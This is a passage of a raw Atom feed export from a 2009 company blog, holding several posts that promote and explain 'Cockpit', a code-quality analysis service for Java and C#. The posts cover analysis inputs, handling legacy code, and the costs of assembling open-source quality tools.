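&lt;p&gt; A real rule would additionally have to find which methods a constructor calls, which is the part that requires the compiled files; this sketch only covers the final check on each called method. &lt;/p&gt;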
&lt;div class="push-up-info"&gt; &lt;div class="push-up-info-txt"&gt; &lt;div class="ks_strong"&gt;Why do we need both the source files and the compiled files in order to extract the same type of information?&lt;/div&gt;In short, the source files allow us to analyze at a syntactic level. Binary files, however, provide access to the structure of the code, the chain of method calls, dependencies, and the instructions (&lt;a href="http://channel8.msdn.com/Posts/MSIL-the-language-of-the-CLR-Part-1/"&gt;MSIL/CIL&lt;/a&gt; for C# or &lt;a href="http://www.ibm.com/developerworks/ibm/library/it-haggar_bytecode/"&gt;bytecode&lt;/a&gt; for Java). This combination provides us with more thorough and complementary results in the Cockpit. &lt;/div&gt; &lt;/div&gt; &lt;p&gt;Finally, for consistent results, all of the elements should be in sync. The source files should be the ones used to generate the compiled files, and the libraries should be the same versions as those used by the code. To avoid problems and facilitate processes, we provide packaging tools that interface with the standard tools (&lt;a href="http://msdn.microsoft.com/fr-fr/library/ms171452%28VS.80%29.aspx"&gt;MSBuild&lt;/a&gt;, &lt;a href="http://msdn.microsoft.com/fr-fr/teamsystem/default.aspx"&gt;Team Foundation System&lt;/a&gt;, &lt;a href="http://ant.apache.org/"&gt;Ant&lt;/a&gt;, &lt;a href="http://maven.apache.org/"&gt;Maven&lt;/a&gt;, &lt;a href="https://hudson.dev.java.net/"&gt;Hudson&lt;/a&gt;...). 
They will be discussed later.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-1435124277000540905?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/1435124277000540905/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/08/what-elements-need-to-be-provided-for.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/1435124277000540905?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/1435124277000540905?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/pLIx7Vt9gxQ/what-elements-need-to-be-provided-for.html" title="What elements need to be provided for an analysis?" 
/><author><name>Charles Bompay</name><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/08/what-elements-need-to-be-provided-for.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEQMQ34yfSp7ImA9WxNSGEw.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-8055370467511265201</id><published>2009-02-09T11:02:00.000+01:00</published><updated>2009-09-01T16:46:22.095+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-01T16:46:22.095+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="cockpit" /><category scheme="http://www.blogger.com/atom/ns#" term="process" /><title>[Case study] New development on an existing application.</title><content type="html">&lt;p&gt;When starting new developments on an existing application, we often set a strategy for ourselves to improve the quality as compared to what was done before.&lt;/p&gt;  &lt;p&gt;For this, we:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;Carry out &lt;strong&gt;targeted corrective actions&lt;/strong&gt; on the existing code, actions that are quick to implement, whose benefits are concrete, and that will not increase the non-regression testing effort.&lt;/li&gt;&lt;li&gt;Start with &lt;strong&gt;more ambitious quality objectives&lt;/strong&gt; for the new code so that we do not reproduce existing problems and so that we do better from the start in order to avoid problems rather than correct problems. &lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;It is difficult, however, to balance these two approaches, since traditional code quality tools analyze the entire project without differentiating between existing code and new code. As a result, when applying the desired rules, the tools generate a huge volume of alerts for the existing code. They drown the team in information, making it difficult to use. 
Consequently, the quality objective loses steam and is eventually limited to a few rules applied to both new and old code.&lt;/p&gt;  &lt;p&gt;The &lt;strong&gt;Cockpit&lt;/strong&gt; allows a different approach by keeping only the existing problems we want to correct on its radar to be sure that progress is made, while holding new development to stricter requirements.&lt;/p&gt;  &lt;p&gt;This approach is quick and easy to implement in just &lt;strong&gt;4 steps&lt;/strong&gt;:&lt;/p&gt; &lt;ol&gt;&lt;li&gt;Perform a &lt;strong&gt;quality diagnostic&lt;/strong&gt; on the application. This diagnostic provides a clear view of the situation by using an automatic analysis of the code and returning qualitative and quantitative information on the problems it finds. &lt;/li&gt;&lt;li&gt;Target the &lt;strong&gt;improvements to be made&lt;/strong&gt;. Based on the diagnostic, you must decide which problems to solve and then prioritize them according to the project constraints. The results of analyses performed with the Cockpit show that these are mainly critical problems corresponding to bugs that must be corrected (concurrent access problems, incorrect instructions, etc.). Other problems may be structural (non-maintainable code), excessive copy/paste code that has been left too long and needs to be corrected, or even problems with a major regression risk. &lt;/li&gt;&lt;li&gt;&lt;strong&gt;Clear the quality radar of&lt;/strong&gt; problems that will not be corrected right now. With the Cockpit, quality rules can be disabled only for specific portions of code (method(s), class(es), module(s), etc.) so as to skip existing code. Reset mode also makes the problems detected in a given version disappear by only considering newly detected problems. For example, it no longer reports overly complex methods that cannot be changed, but it reports all new overly complex methods. 
&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Share this view&lt;/strong&gt; with the entire project team and monitor the implementation of the process. Make it standard usage to visit the Cockpit and dashboards to control quality throughout the project. &lt;/li&gt;&lt;/ol&gt;  &lt;p&gt;During the next iteration, we configure Cockpit to include other improvement actions, if necessary.&lt;/p&gt;  &lt;p&gt;This approach was designed to meet the needs of our customers who need to control overall project quality by distinguishing new development and improvements to existing code. For example, the approach is used for maintenance projects that are used internally or via a TPAM.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-8055370467511265201?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/8055370467511265201/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/08/case-study-new-development-on-existing.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/8055370467511265201?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/8055370467511265201?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/fj5k4Ncsivs/case-study-new-development-on-existing.html" title="[Case study] New development on an existing application." 
/><author><name>Charles Bompay</name><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/08/case-study-new-development-on-existing.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUcHRXY7eSp7ImA9WxNXF0k.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-6689759306686684078</id><published>2009-01-19T11:01:00.001+01:00</published><updated>2009-10-05T14:50:34.801+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-10-05T14:50:34.801+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="cockpit" /><category scheme="http://www.blogger.com/atom/ns#" term="blog" /><category scheme="http://www.blogger.com/atom/ns#" term="tools" /><title>Differences with an OpenSource integration</title><content type="html">&lt;p&gt;We are sometimes asked if our solution, the &lt;a href="http://www.kalistick.com/index.php/english/Cockpit/"&gt;Cockpit&lt;/a&gt;, is different from existing OpenSource tools. Our best response generally involves providing a demonstration of our tool, but the objective here is to make our arguments more specific.&lt;/p&gt;  &lt;p&gt;Everyone knows now that installing OpenSource tools eventually reveals hidden costs. There have been many &lt;em&gt;marketing&lt;/em&gt; discussions on this topic, supporting the position of proprietary tools, with a sometimes significant expression of &lt;a href="http://en.wikipedia.org/wiki/Fear,_uncertainty_and_doubt" title="Fear, Uncertainty and Doubt"&gt;FUD&lt;/a&gt;.&lt;/p&gt;  &lt;p&gt;Our platform is itself based on an infrastructure that includes OpenSource products, and we are well-positioned to know that OpenSource is an often relevant alternative. We say this simply to emphasize the complexity of implementing a quality tracking tool using currently available OpenSource products. 
The purpose is to show that the effort resides not only in installing the tool, but also in the additional tasks that are needed in order to make a &lt;strong&gt;true&lt;/strong&gt; quality improvement.&lt;/p&gt;  &lt;h2&gt;Selection of tools&lt;/h2&gt; &lt;p&gt;Selecting tools is obviously critical to how the remaining steps work. The supply of quality-related tools presents some particularities:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;There is an abundance of tools: several dozen for various languages. For example, here is a &lt;strong&gt;non-exhaustive&lt;/strong&gt; list: &lt;a href="http://www.laatuk.com/tools/review_tools.html"&gt;http://www.laatuk.com/tools/review_tools.html&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;Tools are difficult to compare. Tools that measure metrics, for example, each offer their own set of metrics. And when some metrics are shared between different tools, they are not always calculated the same way.&lt;/li&gt;&lt;li&gt;Because quality analysis is a highly popular subject of research, there are many tools being developed by universities. These tools sometimes stop being developed once the corresponding thesis is complete, or cannot be adapted to practical use on professional projects (some examples: &lt;a href="http://www.spinellis.gr/sw/ckjm/"&gt;ckjm&lt;/a&gt;, &lt;a href="http://ivs.cs.uni-magdeburg.de/sw-eng/us/CAME/CAME.tools.jmt.shtml"&gt;JMT&lt;/a&gt;, &lt;a href="http://loose.upt.ro/iplasma/index.html"&gt;iPlasma&lt;/a&gt;, etc.).&lt;/li&gt;&lt;/ul&gt;  &lt;h2&gt;Installation and integration&lt;/h2&gt; &lt;p&gt;Installing these tools presents a level of complexity that varies greatly from case to case. Installation is usually quite simple. 
Only &lt;a href="http://en.wikipedia.org/wiki/Mashup_%28web_application_hybrid%29"&gt;mashup&lt;/a&gt; tools, which combine different measurement types, sometimes require real work to configure or install third-party tools (see &lt;a href="http://xradar.sourceforge.net/"&gt;XRadar&lt;/a&gt;, &lt;a href="http://qalab.sourceforge.net/"&gt;QALab&lt;/a&gt;, etc.).&lt;/p&gt;  &lt;p&gt;We should note two things:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;Using these tools is only effective when they are run systematically, such as within a continuous integration process. The existing procedure must therefore be modified to launch these tools and to publish their results so that the entire team can see them.&lt;/li&gt;&lt;li&gt;For a full view of the quality of development, several tools are often combined, each providing different measurements. It is therefore difficult to get a consistent summary from these heterogeneous results. Some &lt;em&gt;mashup&lt;/em&gt; tools offer a first-level response to this problem.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Finally, we have to consider how these tools are updated, whether to fix bugs or to add new features or rules.&lt;/p&gt;  &lt;h2&gt;Project settings&lt;/h2&gt; &lt;p&gt;Besides the installation and configuration that is inherent to the tool, we must also configure the scope of code to be analyzed. Depending on the tool, it may work with source files and/or compiled files. We should also be able to supply the third-party libraries that are used for compiling and/or executing the code (which varies according to the tool). Finally, we should be able to exclude some of the code from the analysis: generated code, patched third-party code, test code, etc.&lt;/p&gt;  &lt;p&gt;This work starts at the beginning of the process and continues throughout the project, and the expertise it requires must be passed on whenever the team changes. The ease of updating the settings should be an essential factor when selecting tools. 
In any case, a project must always be well structured in order to be analyzed automatically.&lt;/p&gt;  &lt;h2&gt;Rule settings&lt;/h2&gt; &lt;p&gt;The most critical step involves selecting the quality rules. Some tools provide several hundred rules. It is rarely worthwhile to keep all of these rules because developers will soon be annoyed by an avalanche of anomalies, so we should work with a selection. But this job is complex:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;It requires true expertise in the technology used.&lt;/li&gt;&lt;li&gt;A result depends greatly on how its rule is implemented. Whether for a bad practice, a metric, or a copy/paste, the implementation varies widely from tool to tool. We must therefore experiment with the tool before determining whether any particular rules are truly relevant for a project.&lt;/li&gt;&lt;li&gt;As for metrics, setting thresholds is always a delicate process. For example, what should we choose as the upper threshold for the &lt;a href="http://en.wikipedia.org/wiki/Cyclomatic_complexity"&gt;cyclomatic complexity&lt;/a&gt; of a Java method? And a C# method?&lt;/li&gt;&lt;li&gt;This selection work will likely stir up debates within the team over disputed practices, thresholds thought to be too demanding, etc. It should therefore be handled by someone who knows the subject perfectly.&lt;/li&gt;&lt;li&gt;Existing code is particularly difficult to deal with. How do we correct quality problems without destabilizing code that has already passed functional testing? This issue is discussed in &lt;a href="http://blog.kalistick.com/2009/08/case-study-new-development-on-existing.html"&gt;another entry&lt;/a&gt;. 
&lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;In all cases, the chosen rules must be ranked according to their priority or severity in order to make processing easier.&lt;/p&gt;  &lt;h2&gt;Training and building awareness&lt;/h2&gt; &lt;p&gt;In order to correct problems and avoid repeating them, developers should be trained on the chosen quality rules. There are two possible strategies:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;Review the rules upstream in the project via an oral presentation or an exhaustive recommendation guide.&lt;/li&gt;&lt;li&gt;Let the developers learn about the quality rules by consulting the analysis results. The developers should then have easy access to the documentation for each rule, ideally with examples and links. The true objective is not just to correct problems, but to expand expertise so as not to repeat them, thus achieving a truly continuous improvement process.&lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;In practice, we find that the first solution is not very effective because the developers only retain some of the rules they are shown. Our customers' experience shows that the second solution seems to be more effective, combined with a general presentation upstream to show some structural rules that will apply from the earliest development work.&lt;/p&gt;  &lt;h2&gt;Correction plan&lt;/h2&gt; &lt;p&gt;Detecting violations of quality rules is the first step, but the objective is to correct these anomalies. This aspect is neglected by most tools, even though it is fundamental for quality monitoring to be effective and for the team to be able to measure the application of the quality rules.&lt;/p&gt;  &lt;p&gt;A correction plan might involve allocating the points to be corrected: by priority, by developer, by type, etc. Why not handle these corrections like tasks to be completed, like in a bug tracking tool? 
This allows for better integration of the correction process in the schedule and tracking corrections that have been made.&lt;/p&gt;  &lt;h2&gt;Conclusion&lt;/h2&gt; &lt;p&gt;Implementing a quality monitoring process using OpenSource tools is a real alternative, but be sure to thoroughly compare the items needed in order to get &lt;strong&gt;effective&lt;/strong&gt; results. Besides showing that the project has this or that process, the objective is to achieve a tangible return on investment.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-6689759306686684078?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/6689759306686684078/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/01/differences-with-opensource-integration.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/6689759306686684078?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/6689759306686684078?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/QAu_jPHycCE/differences-with-opensource-integration.html" title="Differences with an OpenSource integration" /><author><name>Sylvain FRANCOIS</name><uri>http://www.blogger.com/profile/06251148498666563285</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="02346869876555156895" /></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/01/differences-with-opensource-integration.html</feedburner:origLink></entry><entry 
gd:etag="W/&quot;DE4HQXs4eCp7ImA9WxNXF0k.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-2852697006941019073</id><published>2009-01-05T14:48:00.000+01:00</published><updated>2009-10-05T14:48:50.530+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-10-05T14:48:50.530+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="cockpit" /><category scheme="http://www.blogger.com/atom/ns#" term="blog" /><category scheme="http://www.blogger.com/atom/ns#" term="tools" /><title>A Cockpit for controlling quality</title><content type="html">This post starts our blog, which is designed for sharing our experience with quality in C# and Java development projects. This experience comes from members of our R&amp;amp;D team and from what we have accumulated each day on our &lt;a href="http://www.kalistick.com/index.php/english/Cockpit/"&gt;Cockpit&lt;/a&gt; platform from the millions of lines of code that have been analyzed in our customers' projects.  &lt;p&gt;We created &lt;strong&gt;Cockpit&lt;/strong&gt; after having found that no tool controlled Java or C# development quality as &lt;strong&gt;simply&lt;/strong&gt; and &lt;strong&gt;pragmatically&lt;/strong&gt; as we wanted. There is huge potential for improvement in the technical quality of development. &lt;em&gt;Generally speaking&lt;/em&gt;, there are two major categories of tools on the market:&lt;/p&gt;  &lt;ul&gt;&lt;li&gt;Analysis agents, often OpenSource for Java environments, that typically specialize in a certain type of detection (metrics, style, bad practices, duplicated code, etc.) for a particular language. &lt;/li&gt;&lt;li&gt;Products, almost always commercial products, that combine the different measurement types and handle several languages in very different ways (object, procedural, query languages, etc.). &lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;The first are directed mainly at technical profiles: developers, architects, technical project managers, etc. 
Their implementation may or may not be complex, but the effort tends to include the following steps: setting the rules and thresholds, integration into an automated process, training and raising awareness among developers, definition and monitoring of an improvement plan for correcting problems, configuration maintenance, and updates to the tool. I will go into detail on all of these in &lt;a href="http://blog.kalistick.com/2009/08/differences-with-opensource-integration.html"&gt;a future post&lt;/a&gt;.&lt;/p&gt;  &lt;p&gt;As for the commercial products, the two obstacles we have identified and have confirmed with our customers are the &lt;strong&gt;cost&lt;/strong&gt; and &lt;strong&gt;complexity&lt;/strong&gt; of using them. Products of this type usually have a very high licensing cost (well over €10,000), plus the possible installation, configuration, updating, consulting, and support fees. Few projects have the necessary budgets for this. The cost can often be explained by the rich features offered to the user or by how flexibly the product can be set up. But these characteristics also make using the product more complex.&lt;/p&gt;  &lt;p&gt;In both cases, many implementation attempts have failed for various reasons:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;Developers did not have enough control over the indicators.&lt;/li&gt;&lt;li&gt;They felt as if they were flooded with alerts.&lt;/li&gt;&lt;li&gt;The information provided was too technical. It did not provide an understandable view of quality for the project managers and managers who are not involved in the project management.&lt;/li&gt;&lt;li&gt;Everyone had difficulty measuring the return on investment for this quality process.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;In these conditions, monitoring quality seems more like a constraint than a way to help improve the project.&lt;/p&gt;  &lt;p&gt;This picture may seem extreme, and many teams are surely satisfied with the tools they have adopted and consider them to be effective. 
Yet this situation seems common, which is why we came up with a different approach to quality, one that can truly be perceived as positive by everyone involved with the project, not just by a single theoretical gauge:&lt;/p&gt;  &lt;ol&gt;&lt;li&gt;Monitoring quality must be &lt;strong&gt;simple&lt;/strong&gt;. This is why we have chosen a &lt;a href="http://en.wikipedia.org/wiki/Software_as_a_Service"&gt;SaaS&lt;/a&gt; model, where the user installs nothing on their own infrastructure and can start their first analysis within a few hours. This monitoring should be included in the company's development process (agile, V cycle, continuous integration, etc.).&lt;/li&gt;&lt;li&gt;Monitoring quality must be &lt;strong&gt;pragmatic&lt;/strong&gt;. Quality requirements must be adapted to the needs and context of the project. Not all projects have the same quality requirements, and excessive quality is costly. It is better to work toward a realistic objective that the team can achieve, perhaps by refining requirements along the way.&lt;/li&gt;&lt;li&gt;The various people involved with the project must &lt;strong&gt;share the same view&lt;/strong&gt; of the status of quality. For this, the information should be presented differently depending on the person viewing it, such as a project director or a developer, but it should express the same results. Using an external third-party service also makes it easier to adopt this common view.&lt;/li&gt;&lt;li&gt;Quality rules should be up to date and &lt;strong&gt;adapted to the current status of the application&lt;/strong&gt;. Development technologies change (languages, frameworks, etc.), and rules should follow suit. Having a statistical database that is updated daily from the analyzed project code seems to us to be a key point in guaranteeing an updated and relevant rule repository.&lt;/li&gt;&lt;/ol&gt;  &lt;p&gt;That introduces our approach. We have been working on our technology for three years. 
We have been able to validate our approach, validate its use by our customers, and now we can share our results with you. The next few posts will be more concrete, dealing more directly with this feedback.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-2852697006941019073?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/2852697006941019073/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/01/cockpit-for-controlling-quality_05.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/2852697006941019073?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/2852697006941019073?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/CMCaC806rck/cockpit-for-controlling-quality_05.html" title="A Cockpit for controlling quality" /><author><name>Sylvain FRANCOIS</name><uri>http://www.blogger.com/profile/06251148498666563285</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="02346869876555156895" /></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/01/cockpit-for-controlling-quality_05.html</feedburner:origLink></entry></feed>
